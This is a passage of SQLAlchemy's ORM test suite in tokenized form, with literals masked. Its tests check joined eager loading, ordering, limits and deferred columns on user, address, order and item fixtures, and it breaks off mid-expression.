<s> """<STR_LIT>""" <EOL> from sqlalchemy . testing import eq_ , is_ , is_not_ , in_ <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import testing <EOL> from sqlalchemy . orm import joinedload , deferred , undefer , joinedload_all , backref , Session , defaultload , Load , load_only , contains_eager <EOL> from sqlalchemy import Integer , String , Date , ForeignKey , and_ , select , func , text <EOL> from sqlalchemy . testing . schema import Table , Column <EOL> from sqlalchemy . orm import mapper , relationship , create_session , lazyload , aliased , column_property <EOL> from sqlalchemy . sql import operators <EOL> from sqlalchemy . testing import assert_raises , assert_raises_message <EOL> from sqlalchemy . testing . assertsql import CompiledSQL <EOL> from sqlalchemy . testing import fixtures , expect_warnings <EOL> from test . orm import _fixtures <EOL> from sqlalchemy . util import OrderedDict as odict <EOL> import datetime <EOL> class EagerTest ( _fixtures . FixtureTest , testing . AssertsCompiledSQL ) : <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_basic ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , lazy = '<STR_LIT>' , order_by = Address . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> eq_ ( [ User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> , email_address = '<STR_LIT>' ) ] ) ] , <EOL> q . filter ( User . id == <NUM_LIT:7> ) . all ( ) ) <EOL> eq_ ( self . static . user_address_result , q . order_by ( User . id ) . all ( ) ) <EOL> def test_late_compile ( self ) : <EOL> User , Address , addresses , users = ( <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users ) <EOL> m = mapper ( User , users ) <EOL> sess = create_session ( ) <EOL> sess . query ( User ) . all ( ) <EOL> m . add_property ( "<STR_LIT>" , relationship ( mapper ( Address , addresses ) ) ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> [ User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> , email_address = '<STR_LIT>' ) ] ) ] , <EOL> sess . query ( User ) . options ( <EOL> joinedload ( '<STR_LIT>' ) ) . filter ( User . id == <NUM_LIT:7> ) . all ( ) <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_no_orphan ( self ) : <EOL> """<STR_LIT>""" <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Address , cascade = "<STR_LIT>" , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> user = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> assert getattr ( User , '<STR_LIT>' ) . hasparent ( <EOL> sa . orm . attributes . instance_state ( <EOL> user . addresses [ <NUM_LIT:0> ] ) , optimistic = True ) <EOL> assert not sa . orm . class_mapper ( Address ) . _is_orphan ( <EOL> sa . orm . attributes . instance_state ( user . addresses [ <NUM_LIT:0> ] ) ) <EOL> def test_orderby ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . email_address ) , <EOL> } ) <EOL> q = create_session ( ) . query ( User ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:10> , addresses = [ ] ) <EOL> ] , q . order_by ( User . id ) . all ( ) ) <EOL> def test_orderby_multi ( self ) : <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , <EOL> order_by = [ addresses . c . email_address , addresses . c . id ] ) , <EOL> } ) <EOL> q = create_session ( ) . query ( User ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:10> , addresses = [ ] ) <EOL> ] , q . order_by ( User . id ) . all ( ) ) <EOL> def test_orderby_related ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> ) ) <EOL> q = create_session ( ) . query ( User ) <EOL> l = q . filter ( User . id == Address . user_id ) . order_by ( <EOL> Address . email_address ) . all ( ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> ] , l ) <EOL> def test_orderby_desc ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , <EOL> order_by = [ sa . desc ( addresses . c . email_address ) ] ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:8> , addresses = [ <EOL> Address ( id = <NUM_LIT:2> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:4> , email_address = '<STR_LIT>' ) , <EOL> Address ( id = <NUM_LIT:3> , email_address = '<STR_LIT>' ) , <EOL> ] ) , <EOL> User ( id = <NUM_LIT:9> , addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) <EOL> ] ) , <EOL> User ( id = <NUM_LIT:10> , addresses = [ ] ) <EOL> ] , sess . query ( User ) . order_by ( User . id ) . all ( ) ) <EOL> def test_no_ad_hoc_orderby ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) . join ( "<STR_LIT>" ) . options ( joinedload ( "<STR_LIT>" ) ) . order_by ( "<STR_LIT>" ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> q = sess . query ( User ) . options ( joinedload ( "<STR_LIT>" ) ) . order_by ( "<STR_LIT>" ) <EOL> with expect_warnings ( "<STR_LIT>" ) : <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_deferred_fk_col ( self ) : <EOL> users , Dingaling , User , dingalings , Address , addresses = ( <EOL> self . tables . users , <EOL> self . classes . Dingaling , <EOL> self . classes . User , <EOL> self . tables . dingalings , <EOL> self . classes . Address , <EOL> self . tables . addresses ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT>' : deferred ( addresses . c . user_id ) , <EOL> '<STR_LIT:user>' : relationship ( User , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( User , users ) <EOL> sess = create_session ( ) <EOL> for q in [ <EOL> sess . query ( Address ) . filter ( <EOL> Address . id . in_ ( [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> ) . order_by ( Address . id ) , <EOL> sess . query ( Address ) . filter ( <EOL> Address . id . in_ ( [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> ) . order_by ( Address . id ) . limit ( <NUM_LIT:3> ) <EOL> ] : <EOL> sess . expunge_all ( ) <EOL> eq_ ( q . all ( ) , <EOL> [ Address ( id = <NUM_LIT:1> , user = User ( id = <NUM_LIT:7> ) ) , <EOL> Address ( id = <NUM_LIT:4> , user = User ( id = <NUM_LIT:8> ) ) , <EOL> Address ( id = <NUM_LIT:5> , user = User ( id = <NUM_LIT:9> ) ) ] <EOL> ) <EOL> sess . expunge_all ( ) <EOL> a = sess . query ( Address ) . filter ( Address . id == <NUM_LIT:1> ) . all ( ) [ <NUM_LIT:0> ] <EOL> def go ( ) : <EOL> eq_ ( a . user_id , <NUM_LIT:7> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sess . expunge_all ( ) <EOL> a = sess . query ( Address ) . filter ( Address . id == <NUM_LIT:1> ) . first ( ) <EOL> def go ( ) : <EOL> eq_ ( a . user_id , <NUM_LIT:7> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sa . orm . clear_mappers ( ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT>' : deferred ( addresses . c . user_id ) , <EOL> } ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' ) } ) <EOL> for q in [ <EOL> sess . query ( User ) . filter ( User . id == <NUM_LIT:7> ) , <EOL> sess . query ( User ) . filter ( User . id == <NUM_LIT:7> ) . limit ( <NUM_LIT:1> ) <EOL> ] : <EOL> sess . expunge_all ( ) <EOL> eq_ ( q . all ( ) , <EOL> [ User ( id = <NUM_LIT:7> , addresses = [ Address ( id = <NUM_LIT:1> ) ] ) ] <EOL> ) <EOL> sess . expunge_all ( ) <EOL> u = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> def go ( ) : <EOL> eq_ ( u . addresses [ <NUM_LIT:0> ] . user_id , <NUM_LIT:7> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> sa . orm . clear_mappers ( ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' , <EOL> order_by = addresses . c . id ) } ) <EOL> mapper ( Address , addresses , properties = { <EOL> '<STR_LIT>' : deferred ( addresses . c . user_id ) , <EOL> '<STR_LIT>' : relationship ( Dingaling , lazy = '<STR_LIT>' ) } ) <EOL> mapper ( Dingaling , dingalings , properties = { <EOL> '<STR_LIT>' : deferred ( dingalings . c . address_id ) } ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> u = sess . query ( User ) . get ( <NUM_LIT:8> ) <EOL> eq_ ( User ( id = <NUM_LIT:8> , <EOL> addresses = [ Address ( id = <NUM_LIT:2> , dingalings = [ Dingaling ( id = <NUM_LIT:1> ) ] ) , <EOL> Address ( id = <NUM_LIT:3> ) , <EOL> Address ( id = <NUM_LIT:4> ) ] ) , <EOL> u ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_options_pathing ( self ) : <EOL> users , Keyword , orders , items , order_items , Order , Item , User , keywords , item_keywords = ( <EOL> self . tables . users , <EOL> self . classes . Keyword , <EOL> self . tables . orders , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . tables . keywords , <EOL> self . tables . item_keywords ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Order , order_by = orders . c . id ) , <EOL> } ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , <EOL> secondary = order_items , order_by = items . c . id ) , <EOL> } ) <EOL> mapper ( Item , items , properties = { <EOL> '<STR_LIT>' : relationship ( Keyword , <EOL> secondary = item_keywords , <EOL> order_by = keywords . c . id ) <EOL> } ) <EOL> mapper ( Keyword , keywords ) <EOL> for opt , count in [ <EOL> ( ( <EOL> joinedload ( User . orders , Order . items ) , <EOL> ) , <NUM_LIT:10> ) , <EOL> ( ( joinedload ( "<STR_LIT>" ) , ) , <NUM_LIT:10> ) , <EOL> ( ( <EOL> joinedload ( User . orders , ) , <EOL> joinedload ( User . orders , Order . items ) , <EOL> joinedload ( User . orders , Order . items , Item . keywords ) , <EOL> ) , <NUM_LIT:1> ) , <EOL> ( ( <EOL> joinedload ( User . orders , Order . items , Item . keywords ) , <EOL> ) , <NUM_LIT:10> ) , <EOL> ( ( <EOL> joinedload ( User . orders , Order . items ) , <EOL> joinedload ( User . orders , Order . items , Item . keywords ) , <EOL> ) , <NUM_LIT:5> ) , <EOL> ] : <EOL> sess = create_session ( ) <EOL> def go ( ) : <EOL> eq_ ( <EOL> sess . query ( User ) . options ( * opt ) . order_by ( User . id ) . all ( ) , <EOL> self . static . user_item_keyword_result <EOL> ) <EOL> self . assert_sql_count ( testing . db , go , count ) <EOL> def test_disable_dynamic ( self ) : <EOL> """<STR_LIT>""" <EOL> users , Address , addresses , User = ( <EOL> self . tables . users , <EOL> self . classes . Address , <EOL> self . tables . addresses , <EOL> self . classes . User ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = "<STR_LIT>" ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> sess = create_session ( ) <EOL> assert_raises_message ( <EOL> sa . exc . InvalidRequestError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sess . query ( User ) . options ( joinedload ( User . addresses ) ) . first , <EOL> ) <EOL> def test_many_to_many ( self ) : <EOL> keywords , items , item_keywords , Keyword , Item = ( <EOL> self . tables . keywords , <EOL> self . tables . items , <EOL> self . tables . item_keywords , <EOL> self . classes . Keyword , <EOL> self . classes . Item ) <EOL> mapper ( Keyword , keywords ) <EOL> mapper ( Item , items , properties = dict ( <EOL> keywords = relationship ( Keyword , secondary = item_keywords , <EOL> lazy = '<STR_LIT>' , order_by = keywords . c . id ) ) ) <EOL> q = create_session ( ) . query ( Item ) . order_by ( Item . id ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result , q . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:0> : <NUM_LIT:2> ] , <EOL> q . join ( '<STR_LIT>' ) . filter ( Keyword . name == '<STR_LIT>' ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:0> : <NUM_LIT:2> ] , <EOL> ( q . join ( '<STR_LIT>' , aliased = True ) . <EOL> filter ( Keyword . name == '<STR_LIT>' ) ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_eager_option ( self ) : <EOL> keywords , items , item_keywords , Keyword , Item = ( <EOL> self . tables . keywords , <EOL> self . tables . items , <EOL> self . tables . item_keywords , <EOL> self . classes . Keyword , <EOL> self . classes . Item ) <EOL> mapper ( Keyword , keywords ) <EOL> mapper ( Item , items , properties = dict ( <EOL> keywords = relationship ( <EOL> Keyword , secondary = item_keywords , lazy = '<STR_LIT>' , <EOL> order_by = keywords . c . id ) ) ) <EOL> q = create_session ( ) . query ( Item ) <EOL> def go ( ) : <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:0> : <NUM_LIT:2> ] , <EOL> ( q . options ( <EOL> joinedload ( '<STR_LIT>' ) <EOL> ) . join ( '<STR_LIT>' ) . <EOL> filter ( keywords . c . name == '<STR_LIT>' ) ) . order_by ( Item . id ) . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_cyclical ( self ) : <EOL> """<STR_LIT>""" <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , <EOL> backref = sa . orm . backref ( '<STR_LIT:user>' , lazy = '<STR_LIT>' ) , <EOL> order_by = Address . id ) <EOL> ) ) <EOL> eq_ ( sa . orm . class_mapper ( User ) . get_property ( '<STR_LIT>' ) . lazy , '<STR_LIT>' ) <EOL> eq_ ( sa . orm . class_mapper ( Address ) . get_property ( '<STR_LIT:user>' ) . lazy , '<STR_LIT>' ) <EOL> sess = create_session ( ) <EOL> eq_ ( <EOL> self . static . user_address_result , <EOL> sess . query ( User ) . order_by ( User . id ) . all ( ) ) <EOL> def test_double ( self ) : <EOL> """<STR_LIT>""" <EOL> users , orders , User , Address , Order , addresses = ( <EOL> self . tables . users , <EOL> self . tables . orders , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . addresses ) <EOL> openorders = sa . alias ( orders , '<STR_LIT>' ) <EOL> closedorders = sa . alias ( orders , '<STR_LIT>' ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders ) <EOL> open_mapper = mapper ( Order , openorders , non_primary = True ) <EOL> closed_mapper = mapper ( Order , closedorders , non_primary = True ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> open_orders = relationship ( <EOL> open_mapper , <EOL> primaryjoin = sa . and_ ( openorders . c . isopen == <NUM_LIT:1> , <EOL> users . c . id == openorders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = openorders . c . id ) , <EOL> closed_orders = relationship ( <EOL> closed_mapper , <EOL> primaryjoin = sa . and_ ( closedorders . c . isopen == <NUM_LIT:0> , <EOL> users . c . id == closedorders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = closedorders . c . id ) ) ) <EOL> q = create_session ( ) . query ( User ) . order_by ( User . id ) <EOL> def go ( ) : <EOL> eq_ ( [ <EOL> User ( <EOL> id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] , <EOL> open_orders = [ Order ( id = <NUM_LIT:3> ) ] , <EOL> closed_orders = [ Order ( id = <NUM_LIT:1> ) , Order ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> User ( <EOL> id = <NUM_LIT:8> , <EOL> addresses = [ Address ( id = <NUM_LIT:2> ) , Address ( id = <NUM_LIT:3> ) , Address ( id = <NUM_LIT:4> ) ] , <EOL> open_orders = [ ] , <EOL> closed_orders = [ ] <EOL> ) , <EOL> User ( <EOL> id = <NUM_LIT:9> , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] , <EOL> open_orders = [ Order ( id = <NUM_LIT:4> ) ] , <EOL> closed_orders = [ Order ( id = <NUM_LIT:2> ) ] <EOL> ) , <EOL> User ( id = <NUM_LIT:10> ) <EOL> ] , q . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_double_same_mappers ( self ) : <EOL> """<STR_LIT>""" <EOL> addresses , items , order_items , orders , Item , User , Address , Order , users = ( <EOL> self . tables . addresses , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . users ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) } ) <EOL> mapper ( Item , items ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> open_orders = relationship ( <EOL> Order , <EOL> primaryjoin = sa . and_ ( orders . c . isopen == <NUM_LIT:1> , <EOL> users . c . id == orders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = orders . c . id ) , <EOL> closed_orders = relationship ( <EOL> Order , <EOL> primaryjoin = sa . and_ ( orders . c . isopen == <NUM_LIT:0> , <EOL> users . c . id == orders . c . user_id ) , <EOL> lazy = '<STR_LIT>' , order_by = orders . c . id ) ) ) <EOL> q = create_session ( ) . query ( User ) . order_by ( User . id ) <EOL> def go ( ) : <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ <EOL> Address ( id = <NUM_LIT:1> ) ] , <EOL> open_orders = [ Order ( id = <NUM_LIT:3> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:3> ) , <EOL> Item ( id = <NUM_LIT:4> ) , <EOL> Item ( id = <NUM_LIT:5> ) ] ) ] , <EOL> closed_orders = [ Order ( id = <NUM_LIT:1> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:1> ) , <EOL> Item ( id = <NUM_LIT:2> ) , <EOL> Item ( id = <NUM_LIT:3> ) ] ) , <EOL> Order ( id = <NUM_LIT:5> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:5> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:8> , <EOL> addresses = [ <EOL> Address ( id = <NUM_LIT:2> ) , <EOL> Address ( id = <NUM_LIT:3> ) , <EOL> Address ( id = <NUM_LIT:4> ) ] , <EOL> open_orders = [ ] , <EOL> closed_orders = [ ] ) , <EOL> User ( id = <NUM_LIT:9> , <EOL> addresses = [ <EOL> Address ( id = <NUM_LIT:5> ) ] , <EOL> open_orders = [ <EOL> Order ( id = <NUM_LIT:4> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:1> ) , <EOL> Item ( id = <NUM_LIT:5> ) ] ) ] , <EOL> closed_orders = [ <EOL> Order ( id = <NUM_LIT:2> , <EOL> items = [ <EOL> Item ( id = <NUM_LIT:1> ) , <EOL> Item ( id = <NUM_LIT:2> ) , <EOL> Item ( id = <NUM_LIT:3> ) ] ) ] ) , <EOL> User ( id = <NUM_LIT:10> ) <EOL> ] , q . all ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_no_false_hits ( self ) : <EOL> """<STR_LIT>""" <EOL> addresses , orders , User , Address , Order , users = ( <EOL> self . tables . addresses , <EOL> self . tables . orders , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . users ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : relationship ( Order , lazy = '<STR_LIT>' ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders ) <EOL> self . allusers = create_session ( ) . query ( User ) . all ( ) <EOL> noeagers = create_session ( ) . query ( User ) . from_statement ( text ( "<STR_LIT>" ) ) . all ( ) <EOL> assert '<STR_LIT>' not in noeagers [ <NUM_LIT:0> ] . __dict__ <EOL> assert '<STR_LIT>' not in noeagers [ <NUM_LIT:0> ] . __dict__ <EOL> def test_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> users , items , order_items , orders , Item , User , Address , Order , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . addresses ) <EOL> mapper ( Item , items ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) <EOL> } ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> '<STR_LIT>' : relationship ( Order , lazy = '<STR_LIT>' , order_by = orders . c . id ) <EOL> } ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> l = q . order_by ( User . id ) . limit ( <NUM_LIT:2> ) . offset ( <NUM_LIT:1> ) . all ( ) <EOL> eq_ ( self . static . user_all_result [ <NUM_LIT:1> : <NUM_LIT:3> ] , l ) <EOL> def test_distinct ( self ) : <EOL> Address , addresses , users , User = ( self . classes . Address , <EOL> self . tables . addresses , <EOL> self . tables . users , <EOL> self . classes . User ) <EOL> u2 = users . alias ( '<STR_LIT>' ) <EOL> s = sa . union_all ( <EOL> u2 . select ( use_labels = True ) , u2 . select ( use_labels = True ) , <EOL> u2 . select ( use_labels = True ) ) . alias ( '<STR_LIT:u>' ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> mapper ( Address , addresses ) , <EOL> lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> } ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> def go ( ) : <EOL> l = q . filter ( s . c . u2_id == User . id ) . distinct ( ) . order_by ( User . id ) . all ( ) <EOL> eq_ ( self . static . user_address_result , l ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_limit_2 ( self ) : <EOL> keywords , items , item_keywords , Keyword , Item = ( <EOL> self . tables . keywords , <EOL> self . tables . items , <EOL> self . tables . item_keywords , <EOL> self . classes . Keyword , <EOL> self . classes . Item ) <EOL> mapper ( Keyword , keywords ) <EOL> mapper ( Item , items , properties = dict ( <EOL> keywords = relationship ( <EOL> Keyword , secondary = item_keywords , <EOL> lazy = '<STR_LIT>' , order_by = [ keywords . c . id ] ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( Item ) <EOL> l = q . filter ( ( Item . description == '<STR_LIT>' ) | <EOL> ( Item . description == '<STR_LIT>' ) | <EOL> ( Item . description == '<STR_LIT>' ) ) . order_by ( Item . id ) . limit ( <NUM_LIT:2> ) . all ( ) <EOL> eq_ ( self . static . item_keyword_result [ <NUM_LIT:1> : <NUM_LIT:3> ] , l ) <EOL> def test_limit_3 ( self ) : <EOL> """<STR_LIT>""" <EOL> addresses , items , order_items , orders , Item , User , Address , Order , users = ( <EOL> self . tables . addresses , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . tables . orders , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . tables . users ) <EOL> mapper ( Item , items ) <EOL> mapper ( Order , orders , properties = dict ( <EOL> items = relationship ( Item , secondary = order_items , lazy = '<STR_LIT>' ) <EOL> ) ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( User , users , properties = dict ( <EOL> addresses = relationship ( <EOL> Address , lazy = '<STR_LIT>' , order_by = addresses . c . id ) , <EOL> orders = relationship ( Order , lazy = '<STR_LIT>' , order_by = orders . c . id ) , <EOL> ) ) <EOL> sess = create_session ( ) <EOL> q = sess . query ( User ) <EOL> if not testing . against ( '<STR_LIT>' ) : <EOL> l = q . join ( '<STR_LIT>' ) . order_by ( <EOL> Order . user_id . desc ( ) ) . limit ( <NUM_LIT:2> ) . offset ( <NUM_LIT:1> ) <EOL> eq_ ( [ <EOL> User ( id = <NUM_LIT:9> , <EOL> orders = [ Order ( id = <NUM_LIT:2> ) , Order ( id = <NUM_LIT:4> ) ] , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> User ( id = <NUM_LIT:7> , <EOL> orders = [ Order ( id = <NUM_LIT:1> ) , Order ( id = <NUM_LIT:3> ) , Order ( id = <NUM_LIT:5> ) ] , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) <EOL> ] , l . all ( ) ) <EOL> l = q . join ( '<STR_LIT>' ) . order_by ( <EOL> Address . email_address . desc ( ) ) . limit ( 